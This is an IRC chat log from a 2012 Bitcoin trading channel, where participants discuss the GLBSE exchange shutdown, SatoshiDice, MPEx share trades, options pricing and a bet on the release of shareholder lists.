wish people would Oct 30 16:47:50 I think Im going to put a notice in the DMC thread Oct 30 16:47:56 dub: I think you have been talking about this "looser" thing for days now. Get some sleep :) Oct 30 16:48:12 if you dont make a claim by the time the information is released, you forfeit your shares Oct 30 16:50:15 "loose" vs. "lose" Oct 30 16:50:23 Diablo-D3 cant do that cuz its not in your contract, also GLBSE is down so people cant amke a claim Oct 30 16:50:28 "noose" vs. "nose" Oct 30 16:50:35 for some reason I think that the next huge fiasco is related to s.dice Oct 30 16:51:04 them scaming and stealing or govt shutting them down? Oct 30 16:51:17 Chaang-Noi: dude, glbse being shutdown isnt in my contract Oct 30 16:51:24 shut down Oct 30 16:51:25 the end of the world quickly approaching isnt in my contract Oct 30 16:51:29 EskimoBob s.dice has been losing big the last couple of days Oct 30 16:51:41 sorry, meant the satoshidice.com Oct 30 16:51:44 the law draws a line somewhere damnit Oct 30 16:51:55 i know diablo-d3 but you cant make it worse by making shit up. stick to the contract Oct 30 16:52:05 I hope I am wrong but this crap https://bitcointalk.org/index.php?topic=121074.0 is sounding like prelude for something else Oct 30 16:52:16 or am I just a bit paranoid today Oct 30 16:52:32 Chaang-Noi: yeah well, I cant do shit until btcmc, asicminer, and btc-mining does something Oct 30 16:52:41 i know Oct 30 16:52:49 just sit tight, its all you can do Oct 30 16:52:59 dont go around saying you will do shit when you cant Oct 30 16:53:27 maybe someone found how to cheat s.dice giga? Oct 30 16:54:26 lol, i've won over 1k coins on that site now Oct 30 16:54:51 Diablo-D3: what law? It a fkn half ass anonymous internet cesspool and this amateurish copy/paste legaleese crap ain't helping Oct 30 16:55:10 EskimoBob: I think you missed the point. Oct 30 16:55:28 giga i lost about that much Oct 30 16:55:31 possible Oct 30 16:55:38 Chaang-Noi lol Oct 30 16:55:45 how do you play s.dice? I never used it Oct 30 16:55:47 my luck is fucking fail Oct 30 16:55:56 everything i do in btc is fail Oct 30 16:56:01 and what is the url Oct 30 16:56:03 Chaang-Noi according to smoothie, you are the "fail captain" Oct 30 16:56:16 got it Oct 30 16:56:25 he is wrong.. i king of fail... just wait until the SEC jails my ass Oct 30 16:56:27 [MPEX] [S.MPOE] 20355 @ 0.00046621 = 9.4897 BTC [+] Oct 30 16:57:09 How can you tell if satoshidice is winning or loosing? Do you track that yourself gigavps? Oct 30 16:57:12 Chaang-Noi: pay me back my PPT's you sold me and then you can go and have your fun in jail Oct 30 16:57:24 i did not sell you shit Oct 30 16:57:31 your broker did Oct 30 16:57:34 OneMiner https://bitcointalk.org/index.php?topic=80312.0 Oct 30 16:57:43 nefario sold you everything Oct 30 16:57:51 you need to talk to him... Oct 30 16:58:18 Chaang-Noi is taking the most conservative view on the matter, but it is a correct view Oct 30 16:58:40 i lost more on lawyers than statishi dice... Oct 30 16:58:46 like i said im king of fail Oct 30 16:59:08 thanks Oct 30 17:00:33 Chaang-Noi: what broker? There was no broker involved Oct 30 17:00:45 lol go look up what that word means Oct 30 17:01:02 cuz you saying i sold you something is lol Oct 30 17:01:09 i never sold you a thing Oct 30 17:01:27 what are those "lessthan" in sdice? Oct 30 17:02:16 when did you send me btc eskimobob? Oct 30 17:02:22 cuz i never got it Oct 30 17:02:26 and i never sent you anything back either Oct 30 17:02:39 Almost -700BTC on 14.7kBTC of wagers. That's pretty bad for SD... wow, that's nearly 5%! Oct 30 17:02:40 thank fuck the real world law works liek this... Oct 30 17:03:11 but 14K is nothing compared what they have made Oct 30 17:03:34 Chaang-Noi: relax now :) Oct 30 17:04:01 yeah that would be nice Oct 30 17:04:45 sending BTC just reminded me that long gone usagi was asking for 200+ BTC and promised massive return. Did any of you got your coins back? Oct 30 17:05:12 i did Oct 30 17:05:24 i asked for it back cuz things just did not smeel right Oct 30 17:05:40 he said no and i said fine id just sell the debt on the open market and see what i got Oct 30 17:05:41 I almost sent that fucker some coin but he went crazy before that Oct 30 17:05:44 so he bought it back Oct 30 17:06:06 yeah s/he going crazy and the odd council with nefario and everything Oct 30 17:06:17 its just seemed all messed up Oct 30 17:06:23 Chaang-Noi: dude, you probably got lucky Oct 30 17:06:44 yeah it was about 200 btc i think Oct 30 17:06:56 but still im so far down 200 seems like nothing Oct 30 17:07:12 half of people in BTC business are scammers Oct 30 17:07:37 505 chance giga Oct 30 17:07:39 50% Oct 30 17:07:54 there Oct 30 17:07:57 https://www.youtube.com/watch?feature=player_embedded&v=f17fWth3YgA Oct 30 17:08:34 glad i sold my gigabonds to buy asic miner.. oh wait.. glbse faill but wait, does not even mater cuz nefario stole my account, lulz Oct 30 17:09:02 anyway im fail king and im off to bed Oct 30 17:09:05 night all Oct 30 17:09:10 bye Oct 30 17:09:32 night Oct 30 17:10:03 later fail king Oct 30 17:18:19 ;;calc 1.32/10.83 Oct 30 17:18:20 0.12188365651 Oct 30 17:21:57 [MPEX] [S.MPOE] 9572 @ 0.00046601 = 4.4606 BTC [-] Oct 30 17:23:46 da,m Oct 30 17:23:50 i actually had a question for chang Oct 30 17:26:45 you know Oct 30 17:26:49 I should make a video game Oct 30 17:26:51 an awesome video game Oct 30 17:26:54 a video game to end all video games Oct 30 17:27:02 internal world currency? bitcoins. Oct 30 17:27:12 rg, i still have that ipv6 question for you Oct 30 17:27:15 no Oct 30 17:27:22 lets play monopoly Oct 30 17:27:24 lol Oct 30 17:27:36 ha ha imagine monopoly with bitcoins Oct 30 17:27:58 hehe... only that there will be no jail Oct 30 17:28:55 we do it every night Oct 30 17:28:58 i missed last night Oct 30 17:29:06 .2 btc buy i Oct 30 17:29:07 in* Oct 30 17:31:38 Diablo-D3, they already made some ubergame with devcoins Oct 30 17:32:13 http://www.devtome.org/wiki/index.php?title=Galactic_Milieu Oct 30 17:33:21 i'll look into in after i retire perhaps Oct 30 17:33:26 *into it Oct 30 17:37:23 jurov Oct 30 17:37:42 ä? Oct 30 17:39:12 is historical data being logged? Oct 30 17:39:13 lol Oct 30 17:40:06 yes. what kind of data exactly? Oct 30 17:41:55 just price data against volume Oct 30 17:42:01 i need to run it against option expirations Oct 30 17:42:58 and current usd price Oct 30 17:43:06 date price volume Oct 30 17:44:32 oh not again Oct 30 17:44:33 [15:22:05] happyworld: i want to ask is there good PHP programer Oct 30 17:44:33 [16:41:05] Diler.si: what for Oct 30 17:44:33 [16:41:57] happyworld: i want to make site for bitcoin trading Oct 30 17:44:33 [16:42:30] Diler.si: what kind of bitcoin trading site Oct 30 17:44:33 [16:43:07] happyworld: margain trading as Bitcoinica Oct 30 17:44:34 [16:43:49] happyworld: i want it secure Oct 30 17:44:35 [16:43:58] happyworld: margain trading Oct 30 17:44:58 you know, I never did get any devcoins Oct 30 17:46:35 thestringpuller, no, i'm saving only mpex trades, not anything usd-related Oct 30 17:47:20 maybe there's mtgox or bitcoincharts or clarkmoody api for such Oct 30 17:47:39 [MPEX] [S.MPOE] 4028 @ 0.00046212 = 1.8614 BTC [-] Oct 30 17:47:41 [MPEX] [S.MPOE] 18245 @ 0.00046621 = 8.506 BTC [+] Oct 30 17:47:42 [MPEX] [S.MPOE] 12110 @ 0.0004664 = 5.6481 BTC [+] Oct 30 17:47:42 [MPEX] [S.MPOE] 2517 @ 0.00046708 = 1.1756 BTC [+] Oct 30 17:49:21 i have that data Oct 30 17:49:28 i just need timestamp data like from assbo Oct 30 17:49:30 assbot Oct 30 17:49:41 jurov ^ Oct 30 17:50:42 [MPEX] [O.BTCUSD.P120T] 2 @ 0.23363707 = 0.4673 BTC [-] Oct 30 17:51:34 something like http://live.coinbr.com/trades24.json?mpsic=S.MPOE ? Oct 30 17:52:40 [MPEX] [O.BTCUSD.P110T] 2 @ 0.18264825 = 0.3653 BTC [-] Oct 30 17:53:07 [MPEX] [O.BTCUSD.P100T] 2 @ 0.13841608 = 0.2768 BTC [+] Oct 30 18:07:25 thestringpuller, did that help? Oct 30 18:12:37 yea Oct 30 18:14:58 if you need only last hour txs, you can fetch rss directly form mpex Oct 30 18:15:08 http://www.rockethub.com/projects/11106-crowdsourcing-discovery Oct 30 18:19:23 [MPEX] [S.MPOE] 4000 @ 0.000461 = 1.844 BTC [-] Oct 30 18:19:24 [MPEX] [S.MPOE] 32536 @ 0.00046099 = 14.9988 BTC [-] Oct 30 18:36:46 pigeons: interesting link Oct 30 18:39:13 ;) Oct 30 18:45:03 [MPEX] [S.MPOE] 564 @ 0.00046031 = 0.2596 BTC [-] Oct 30 18:45:04 [MPEX] [S.MPOE] 20936 @ 0.00046228 = 9.6783 BTC [+] Oct 30 19:47:10 these nuts. https://bitcointalk.org/index.php?topic=119634.msg1307444;topicseen#msg1307444 Oct 30 19:47:12 eh Oct 30 19:47:16 wrong link Oct 30 19:47:22 these nuts https://bitcointalk.org/index.php?topic=119634.msg1307444;topicseen#msg1307444 Oct 30 19:47:48 wait was it was the correct link the first time Oct 30 19:47:50 i need food. Oct 30 19:55:12 why? you wanted a slot too? Oct 30 20:00:56 [MPEX] [S.MPOE] 33784 @ 0.00046029 = 15.5504 BTC [-] Oct 30 20:00:58 [MPEX] [S.MPOE] 8916 @ 0.00045957 = 4.0975 BTC [-] Oct 30 20:26:17 [MPEX] [S.MPOE] 2200 @ 0.00046228 = 1.017 BTC [+] Oct 30 20:51:48 [MPEX] [S.MPOE] 5918 @ 0.00045957 = 2.7197 BTC [-] Oct 30 21:16:51 [MPEX] [S.MPOE] 39400 @ 0.00045857 = 18.0677 BTC [-] Oct 30 21:17:36 smickles: i pmed you something about my mini margin Oct 30 21:18:27 also sorry about passing out before we could start a monopoly game we can try again tonight Oct 30 21:36:34 theymos must be making some srs coin in this 'new forum software' scam Oct 30 21:40:26 lol Oct 30 21:41:53 [MPEX] [S.MPOE] 7400 @ 0.00045857 = 3.3934 BTC [-] Oct 30 21:41:55 [MPEX] [S.MPOE] 1800 @ 0.00045842 = 0.8252 BTC [-] Oct 30 21:45:01 preetymuch yea Oct 30 21:59:18 ;;calc 4*21 + 4*20 Oct 30 21:59:18 164 Oct 30 21:59:25 you mean this? Oct 30 22:00:22 jurov Oct 30 22:00:36 what was that link agian to historical data? Oct 30 22:00:48 is there table data i can access? Oct 30 22:01:34 http://live.coinbr.com/trades24.json?mpsic=S.MPOE Oct 30 22:03:29 i can add "since" parameter .. but am not inclined to blow my data cap by supplying too much Oct 30 22:03:59 or maybe i can provide such only for registered users Oct 30 22:04:40 mircea_popescu: it does :) Oct 30 22:05:03 thestringpuller: np about monopoly, we'll play another time Oct 30 22:05:16 also, are you sure you sent that pm to me? Oct 30 22:07:17 [MPEX] [S.MPOE] 7582 @ 0.00045938 = 3.483 BTC [+] Oct 30 22:07:18 [MPEX] [S.MPOE] 17264 @ 0.00046228 = 7.9808 BTC [+] Oct 30 22:07:19 [MPEX] [S.MPOE] 2300 @ 0.00046335 = 1.0657 BTC [+] Oct 30 22:07:20 [MPEX] [S.MPOE] 20954 @ 0.00046399 = 9.7224 BTC [+] Oct 30 22:14:12 'cause I don't see it :o Oct 30 22:15:34 hey Oct 30 22:15:36 mang Oct 30 22:15:39 sorrrry Oct 30 22:15:50 wanna play monopoly tonight Oct 30 22:15:59 smickles: ^ Oct 30 22:16:33 thestringpuller: sure, at about 9pm (utc-7) Oct 30 22:16:50 9 pm mt? Oct 30 22:16:59 i think so Oct 30 22:17:15 well, it happens to be the same as mt right now Oct 30 22:17:32 after the daylight savings time change, it won't be mt anymore Oct 30 22:17:51 lolwtf http://www.bitcoin-keys.com/Sales.html Oct 30 22:18:29 kakobrekla: i didn't know that bitcoin was around back in the '90s Oct 30 22:18:41 :D Oct 30 22:18:51 man thats what i thought 2 years back Oct 30 22:19:04 when i discovered it, all sites were like wtf is this real or scammy joke Oct 30 22:19:18 it=bitcoin Oct 30 22:20:17 military discount :) maybe i'll consider it Oct 30 22:21:01 copy of the id? military ids have ssn on them ! Oct 30 22:21:08 who would give out a copy of that? Oct 30 22:22:02 "Verification is all digital 15-20 minute process that includes a digital document signed digitally by you. You will also be required to submit a I.D. and Credit Card/Debit card with all but the last 4 digits blocked out. " Oct 30 22:22:21 lol on the frontpage text gets cut Oct 30 22:22:28 "I also check my email frequently during off hours for yo" Oct 30 22:24:01 this is genial. user will pay $5 for "verification" - privilege to submit personal documents that can be reused to verify mtgox acct, for example Oct 30 22:24:15 double whammy Oct 30 22:27:30 smickles/jurov, hopefully, watermarking it/blurring ssn is okay. Oct 30 22:27:48 So they can't be reused elsewhere Oct 30 22:28:38 >ALL SALES REQUIRE VERIFICATION NOW Oct 30 22:28:44 how the hell do i buy verification then Oct 30 22:31:54 Sale of verification excluded of course... why require verification for something you don't care if it's chargebacked. Oct 30 22:32:14 Coming Soon! When you are verified a number will be assigned to you, if you are every buying something form someone in the community you send me a email. I will email the person ask for your verification the number, you then confirm your number with the person who is asking. No one ever see's anything but your number. 100% secure on both ends! Oct 30 22:32:14 Cost Free Oct 30 22:32:15 ^^ Oct 30 22:32:40 i dont even.. Oct 30 22:32:44 as i said... he wants to reuse your ID for mtgox registration Oct 30 22:33:20 watermark the ID Oct 30 22:33:40 just dont use the service Oct 30 22:33:48 its silly Oct 30 22:34:00 [MPEX] [S.MPOE] 4400 @ 0.00045968 = 2.0226 BTC [-] Oct 30 22:34:01 [MPEX] [S.MPOE] 23000 @ 0.00046399 = 10.6718 BTC [+] Oct 30 22:34:02 [MPEX] [S.MPOE] 1700 @ 0.00046598 = 0.7922 BTC [+] Oct 30 22:35:58 Well then, watermark 500 IDs from around the world. Send them all and ask "Choose one, whichever you find the most acceptable." Oct 30 22:37:57 someone obviously has too much time on their hands Oct 30 22:43:05 mnw? http://i.minus.com/ilYIIP2c9rSly.gif Oct 30 22:46:08 I also have juice containing mashed sweet potato. But I'd trade it for more free time to look up ingredients list on things I consume for more odd ingredients and chemicals. Oct 30 22:59:27 [MPEX] [S.MPOE] 8000 @ 0.00045953 = 3.6762 BTC [-] Oct 30 23:24:40 [MPEX] [S.MPOE] 11800 @ 0.00045842 = 5.4094 BTC [-] Oct 30 23:31:22 jurov Oct 30 23:31:24 jurov Oct 30 23:31:42 mr. broker man Oct 30 23:33:25 you're lucky, i almost went already Oct 30 23:34:41 cam i send coina your way for margin? Oct 30 23:35:03 i wanma get ahead of the wall before the price shoots up... Oct 30 23:35:49 yes, you can Oct 30 23:41:27 you still thwew? Oct 30 23:41:31 there? Oct 30 23:41:56 yea, waiting for you Oct 30 23:42:39 sent Oct 30 23:43:17 lemme know when i can trade. thanks for the convenience Oct 30 23:44:28 done Oct 30 23:48:03 transaction should hit next block Oct 30 23:48:38 yes, i see it, i have updated your balance without waiting for tx Oct 30 23:49:13 you can trade nao Oct 30 23:50:01 [MPEX] [S.MPOE] 5800 @ 0.00045931 = 2.664 BTC [+] Oct 30 23:50:23 * er, without waiting for block Oct 30 23:50:30 am not so reckless Oct 30 23:53:46 looks like that "instant mpex funding" can be quite attractive marketing-wise... but must have reliable bitcoind monitoring + enough reserve at mpex first... Oct 30 23:54:25 yeah, that worked out pretty slick it looks like Oct 30 23:55:06 [MPEX] [S.MPOE] 6000 @ 0.00045931 = 2.7559 BTC [+] Oct 30 23:55:20 thas what brokers are for Oct 30 23:55:27 insta funding is a wot thing Oct 30 23:55:49 its like pseudo margin Oct 30 23:59:04 it does not need extra trust, i don't see a problem doing it for anyone Oct 30 23:59:29 heh Oct 30 23:59:39 you need a green address style thingoe Oct 30 23:59:43 thingie* Oct 31 00:01:12 like 1CoinBr662GWdiqVz8mXJUnYjWZbBchKAb ? Oct 31 00:01:44 but i need one per user anyway Oct 31 00:10:28 will that bid wall on mpoe have an effect? Oct 31 00:12:24 oh that..... iirc it's put there by mircea himself, long time ago Oct 31 00:20:12 [MPEX] [S.MPOE] 7557 @ 0.00045842 = 3.4643 BTC [-] Oct 31 00:20:14 [MPEX] [S.MPOE] 24043 @ 0.00045819 = 11.0163 BTC [-] Oct 31 00:20:27 *it's been put there is moar correct, no? Oct 31 00:22:34 no the smaller one Oct 31 00:23:03 .00044939 @ sell depth ~ 1m Oct 31 00:23:31 people are selling into the wall Oct 31 00:25:57 goodnight..have to wake early Oct 31 00:30:32 jurov you have a data cap ? Oct 31 00:31:00 mircea_popescu: you crazy romanian Oct 31 00:33:23 hallo Oct 31 00:35:48 ;;ticker Oct 31 00:35:48 BTCUSD ticker | Best bid: 10.75104, Best ask: 10.84000, Bid-ask spread: 0.08896, Last trade: 10.84000, 24 hour volume: 24221.65679096, 24 hour low: 10.58000, 24 hour high: 10.85000, 24 hour vwap: 10.73588 Oct 31 00:35:55 o headed back to 11 ? Oct 31 00:39:26 lol Oct 31 00:40:16 mircea_popescu: if i visit romania can we hang out and go to romanian strip clubs? Oct 31 00:40:28 http://polimedia.us/dtng/c/src/134621792179.jpg butt at 11. Oct 31 00:40:44 thestringpuller maybe. Oct 31 00:40:57 no strip clubs in romania yet, but mircea's has a sister Oct 31 00:41:08 #1 in all of romanistan Oct 31 00:42:10 mircea_popescu: so option prices will decline as the month closes? Oct 31 00:42:19 yes. Oct 31 00:42:34 option price has a time component Oct 31 00:43:02 it feels like tehy are most effective at the end of the month... Oct 31 00:43:26 thestringpuller: most effective? Oct 31 00:43:41 best to buy... Oct 31 00:43:54 maybe Oct 31 00:43:57 assuming he doesn't have a silly strategy, they're probably no better to buy Oct 31 00:44:07 unless there's external information that he hasn't factored in Oct 31 00:44:10 the only reason my options paid off was the price was low during a price swap Oct 31 00:44:25 timing is the key factor... Oct 31 00:44:44 nobody succeeds in timing the market. Oct 31 00:45:05 it sure gets wannabe traders' rocks off though Oct 31 00:45:10 true Oct 31 00:45:10 best let people think they can Oct 31 00:45:12 not 100% of the time Oct 31 00:45:29 the time is irrelevant Oct 31 00:45:34 you want more than 50% of the money ;) Oct 31 00:45:35 [MPEX] [S.MPOE] 6500 @ 0.00045868 = 2.9814 BTC [+] Oct 31 00:45:45 this has been the greatest fallacy in economics. the notion that human agency can improve the end results. Oct 31 00:45:55 in fact hedge funds consistently underperform indexes. Oct 31 00:46:10 except for a couple :) Oct 31 00:46:37 ya, except for a couple : one that doesn't try to time and another that got there by accident. Oct 31 00:46:48 :P Oct 31 00:46:51 :p Oct 31 00:47:48 haha Oct 31 00:48:05 what do they use instead of timing? Oct 31 00:48:15 copumpkin i particularly enjoy the fact that all sorts of imbecile "economists" explain how vulnerable bitcoin is to "well established strategies" Oct 31 00:48:31 and then i fail to see them raping bitcoin on mpex with those "well established" strategies of theirs. Oct 31 00:48:34 duuude, just look at the charts Oct 31 00:48:39 I'mma draw a fibonacci spiral Oct 31 00:48:44 right-o Oct 31 00:48:52 http://www.zerohedge.com/news/2012-09-22/peak-career-risk-only-8-hedge-funds-are-outperforming-market Oct 31 00:48:56 I'll invite you to my yacht later Oct 31 00:49:21 mircea_popescu: what strategy would you use? or is it a trade secret? Oct 31 00:49:51 "Bitcoin takes the monetary system back essentially a hundred years. We know how to beat that system. In fact, we know how to nuke it for profit" Oct 31 00:49:53 and yet... Oct 31 00:50:28 thestringpuller i use the strategy of "try to build useful things" Oct 31 00:51:03 mod6: where do they get their data? Oct 31 00:51:32 oh, from that chart from GS Oct 31 00:51:57 sloppy 2nds Oct 31 00:52:33 copumpkin: here's another i just found: http://www.efinancialnews.com/story/2012-07-10/hfr-h1-hedge-funds-first-half-performance Oct 31 00:53:15 anyway, its been widly reported this year -- just seaching on google for stuff. Oct 31 00:54:04 build useful things? Oct 31 00:54:09 anyway, the massacre hedge funds are suffering at the hands of a compeltely imaginary stock market is really sad. Oct 31 00:54:27 they should be rewarded for their prudence not punished for not having been dumb enough to play bernanke Oct 31 00:55:23 mod6: oh, I was just looking for a list of who was doing better Oct 31 00:55:52 oh my bad. :) Oct 31 00:58:10 here's another one: Oct 31 00:58:11 “Hedge funds are up 3.04% year-to-date as of September, 2012, compared to 13.97% for the S&P 500,” said Mary Ann Bartels, technical research analyst at Bank of America Merrill Lynch. Oct 31 00:58:14 “This ranks as the third worst relative performance for Q1-Q3 since our records begin in 1994, following 1995’s 12.8% and 1997’s 11%.” Oct 31 00:58:32 http://business.financialpost.com/2012/10/01/relative-hedge-fund-returns-worst-since-1997/ Oct 31 01:01:50 [MPEX] [S.MPOE] 9100 @ 0.00045868 = 4.174 BTC [+] Oct 31 01:01:51 [MPEX] [S.MPOE] 31900 @ 0.00045931 = 14.652 BTC [+] Oct 31 01:01:52 [MPEX] [S.MPOE] 18680 @ 0.00046598 = 8.7045 BTC [+] Oct 31 01:01:53 [MPEX] [S.MPOE] 8583 @ 0.00046708 = 4.0089 BTC [+] Oct 31 01:01:54 [MPEX] [S.MPOE] 4000 @ 0.000468 = 1.872 BTC [+] Oct 31 01:01:55 [MPEX] [S.MPOE] 5700 @ 0.00046805 = 2.6679 BTC [+] Oct 31 01:01:56 [MPEX] [S.MPOE] 39900 @ 0.00046864 = 18.6987 BTC [+] Oct 31 01:01:58 [MPEX] [S.MPOE] 12100 @ 0.00046909 = 5.676 BTC [+] Oct 31 01:01:59 [MPEX] [S.MPOE] 14500 @ 0.00046956 = 6.8086 BTC [+] Oct 31 01:02:00 [MPEX] [S.MPOE] 42025 @ 0.00046956 = 19.7333 BTC [+] Oct 31 01:02:01 [MPEX] [S.MPOE] 8959 @ 0.00046965 = 4.2076 BTC [+] Oct 31 01:02:02 [MPEX] [S.MPOE] 5800 @ 0.0004705 = 2.7289 BTC [+] Oct 31 01:02:02 [MPEX] [S.MPOE] 16500 @ 0.00047103 = 7.772 BTC [+] Oct 31 01:02:03 [MPEX] [S.MPOE] 7800 @ 0.00047186 = 3.6805 BTC [+] Oct 31 01:02:04 [MPEX] [S.MPOE] 44300 @ 0.00047269 = 20.9402 BTC [+] Oct 31 01:02:05 [MPEX] [S.MPOE] 28900 @ 0.00047316 = 13.6743 BTC [+] Oct 31 01:02:06 [MPEX] [S.MPOE] 1157 @ 0.00047992 = 0.5553 BTC [+] Oct 31 01:02:08 [MPEX] [S.MPOE] 700096 @ 0.00048 = 336.0461 BTC [+] Oct 31 01:02:32 rally Oct 31 01:02:39 o wow it was 45 ? Oct 31 01:03:04 then again... october was a pretty darn shitty month. Oct 31 01:03:14 mpoe made a wash, s.dice i guess will report its first loss ? Oct 31 01:05:03 well, if people value mpex in terms of usd, a drop in usd/btc should mean s.mpoe rally Oct 31 01:05:15 with a little lag, it seems Oct 31 01:06:19 why would people value mpex in terms of usd ? Oct 31 01:06:29 btc/usd value is on the rise Oct 31 01:06:49 mircea_popescu: you can get more shares for your btc Oct 31 01:06:54 ;;ticker Oct 31 01:06:55 BTCUSD ticker | Best bid: 10.81400, Best ask: 10.81999, Bid-ask spread: 0.00599, Last trade: 10.82000, 24 hour volume: 24414.81850755, 24 hour low: 10.58000, 24 hour high: 10.85000, 24 hour vwap: 10.73950 Oct 31 01:07:39 in terms of usd Oct 31 01:08:01 i still don't see it. Oct 31 01:08:06 i mean, i guess some do, but Oct 31 01:09:26 mircea_popescu: It might be justifiable for someone with net worth which is mostly tied up in usd to value even things like MPEx in usd Oct 31 01:09:50 like a convenience thing ? Oct 31 01:10:47 convenience could be one reason. relatedly, maybe they can only 'think' in terms of usd Oct 31 01:11:31 aka convenience. maybe so. Oct 31 01:11:39 or they see it as an investment where they want a return in usd terms, they don't care about btc value fluctuations Oct 31 01:12:28 ya i guess if they do that then weakening of btc/usd is actually buy signal for s.mpoe Oct 31 01:12:37 as in, "get more shares of the same company for the same usd" Oct 31 01:12:53 exactly Oct 31 01:12:54 then lag would measure their usd -> btc -> mpex latency Oct 31 01:13:11 additionally, their awareness Oct 31 01:13:23 ya. like 24 hours, that's not too bad Oct 31 01:14:49 https://bitcointalk.org/index.php?topic=121158.0 i coulda sworn somebody was doing this exactly Oct 31 01:15:41 yeah jjjimy or whatever his name is Oct 31 01:16:21 nah Oct 31 01:16:26 or did he get taken out in some way? Oct 31 01:16:27 of the old guys Oct 31 01:17:45 your sec sigline seems to be getting good exposure (for the forum) Oct 31 01:18:34 it certainly seems to have broken the psychosis. Oct 31 01:26:50 mircea_popescu: whats next? Oct 31 01:27:22 who knows ? Oct 31 01:28:24 you do Oct 31 01:28:31 mr. illuminati Oct 31 01:28:43 i bet you manipulate the markets Oct 31 01:28:45 lol jk Oct 31 01:28:51 [MPEX] [S.MPOE] 18970 @ 0.00046037 = 8.7332 BTC [-] Oct 31 01:28:58 and also slept with pirate's hot sister Oct 31 01:29:26 http://polimedia.us/bitcoin/mpex.php?mpsic=B.MPCD.C Oct 31 01:29:31 lol Oct 31 01:30:23 heh Oct 31 01:30:44 "he also lied about having an OTC rating at the time if the transaction to get me to send first. I was knew and didn't know what OCT was then and was desperate for money so I foolishly agreed." Oct 31 01:30:44 at least it isn't a buy order Oct 31 01:31:12 people should buy moar grammer Oct 31 01:32:01 wow, i'ven't the mind to understand that Oct 31 01:38:02 "I thought genjix had to eat catfood + bits of newspaper cause he was so poor ?" 0.0 Oct 31 01:50:10 o also, f.giga.etf going away on dec 1st, if anyone missed it earlier Oct 31 01:50:11 https://bitcointalk.org/index.php?topic=121308.0 Oct 31 01:54:10 [MPEX] [S.MPOE] 900 @ 0.00045982 = 0.4138 BTC [-] Oct 31 01:56:24 ;;ticker Oct 31 01:56:25 BTCUSD ticker | Best bid: 10.80101, Best ask: 10.88754, Bid-ask spread: 0.08653, Last trade: 10.80100, 24 hour volume: 25732.98766624, 24 hour low: 10.58000, 24 hour high: 10.89000, 24 hour vwap: 10.75200 Oct 31 02:02:06 What if the information is released at a later date? Oct 31 02:03:21 i guess the proceeds get donated. Oct 31 02:03:58 =/ Oct 31 02:04:06 what can i tell you. Oct 31 02:04:34 it's been a month already. november is another month. how much later than that ? 2014 ? Oct 31 02:05:33 Well maybe not. Oct 31 02:06:39 But seeing as he sent payments (the good amounts) to many and it's not completed after one month, it doesn't look like he lost the database. But he's been incredibly slow. Oct 31 02:06:45 irl dividends are paid yearly. in bitcoin people expect weekly, some even daily. monthly is considered VERY rarely. Oct 31 02:07:25 yet when it comes to booking losses... nobody thinks o look, five weeks that's five irl years Oct 31 02:07:27 So if he releases data, I would doubt it would happen by December 1st Oct 31 02:07:38 really ? Oct 31 02:07:55 really what? Oct 31 02:07:59 i think it's much like missing persons. those not found in twoo weeks are never found. Oct 31 02:10:43 Yes, but it's not like Nefario disappeared without any news with everything. Oct 31 02:11:21 If one day, the website had suddenly disappeared along with Nefario, that would be acceptable. Oct 31 02:11:21 well... the way these things work is that there's some communication originally... but nothing comes of it. Oct 31 02:11:58 bitcoinica's still not paid. people still entertain the notion they will get something back, obviously, but it's been what, half a year. Oct 31 02:12:20 But Nefario paid many people so far =/ Oct 31 02:12:20 bitfloor... went down, guy asked for our help, now he's gone. Oct 31 02:12:46 BTC-Mining paid some people originally. that was weeks ago. then he stopped payng, and now his site is gone. Oct 31 02:13:31 (in fact, it may well be argued nefario stole the few k btc he had of glbse money, then insisted theymos return the few hundred he held, then used that to pay SOME people and end of story there) Oct 31 02:13:54 Last 2 statements seems innaccurate. Oct 31 02:14:17 did he pay more than what theymos held ? Oct 31 02:14:24 i recall you had a thread about it Oct 31 02:14:36 Apparently, a lot more. Oct 31 02:15:14 how much does it all add up to, got al ink handy ? Oct 31 02:15:18 From only declared claims which are a lot fewer than the payment chains seen those claims are included in. Oct 31 02:15:33 Let me fetch that Oct 31 02:15:35 nm found it Oct 31 02:16:15 i see ~1300 btc ? (why not add a TOTAL at the end ?) Oct 31 02:16:56 Not a bad idea Oct 31 02:17:52 but anyway, a key consideration is that those shareholder lists are only useful early on. they decay so to speak Oct 31 02:18:48 But claims are included in payment chains for much larger amounts. It is yet to see if users received all of those without more claims. Oct 31 02:19:14 suppsoe i have a 1k btc payment in my wallet (and it's all i have) Oct 31 02:19:32 if i pay you 100 btc, is it right that my program takes 100 btc to your address and 900 btc to another address of mine ? Oct 31 02:19:44 Yup Oct 31 02:20:05 [MPEX] [S.MPOE] 16457 @ 0.00045819 = 7.5404 BTC [-] Oct 31 02:20:06 so... Oct 31 02:20:07 [MPEX] [S.MPOE] 5243 @ 0.00045799 = 2.4012 BTC [-] Oct 31 02:20:10 Should be like that, considering that's how bitcoin transactions work... Oct 31 02:20:18 much more importantly tho, were all the payments sorta early oct ? Oct 31 02:21:12 Mid october. Had been over a week. Oct 31 02:21:23 mk Oct 31 02:21:44 so what makes you think that the lists will be released, but after december ? Oct 31 02:22:02 At least for mine. I was one of the first paid out I think. Oct 31 02:24:32 Because since Nefario did not disappear with the funds, I still believe it is in the "realm of probable" that he'll release the information, and not in the "realm of possible" Oct 31 02:25:54 ok, so you believe he'll release it Oct 31 02:26:02 but why wouyld it take another month ? Oct 31 02:26:04 You know how it was. Nefario would say he'd have a new feature released next week and end up completing it 2 month laters. Oct 31 02:26:18 you gotta be kidding me Oct 31 02:26:44 He also managed to screw up payments on the 16th Oct 31 02:27:38 and he seems to want to send all balances out before then giving the addresses to issuers. Oct 31 02:27:52 so when exactly do you expect the shareholder lists to be released ? Oct 31 02:28:21 Somewhere in the next weeks to 3 months Oct 31 02:29:05 After that I'd probably start to assume he managed to lose the database after closing GLBSE Oct 31 02:30:40 mk, so wanna bet the shareholder lists aren't released by feb 1st ? Oct 31 02:32:55 feb 1st? I'd bet you 5 BTC it is released by then. (For those who submitted their information, not in full.) Oct 31 02:34:52 what were decent-ish assets there ? giga, asicminer and what'd be a third ? Oct 31 02:35:05 Bitbond Oct 31 02:35:17 so who is going to escrow the bet Oct 31 02:35:21 and quite a few lowball mining operations Oct 31 02:35:52 Mutual trust? Oct 31 02:36:07 Unless mircea wants an escrow for this one. Oct 31 02:36:23 mkay. so " by feb 1st more than half the shareholders are reinstated in at least two of gigamining, asicminer, bitbond as a result of nefario releasing the lists to the respective asset owners" Oct 31 02:36:26 is our bet. Oct 31 02:36:28 works for you ? Oct 31 02:38:25 I have no idea what proportion of holders gave their info to be sent to issuer. I would go more by the lack of complaints that some submitted their info and 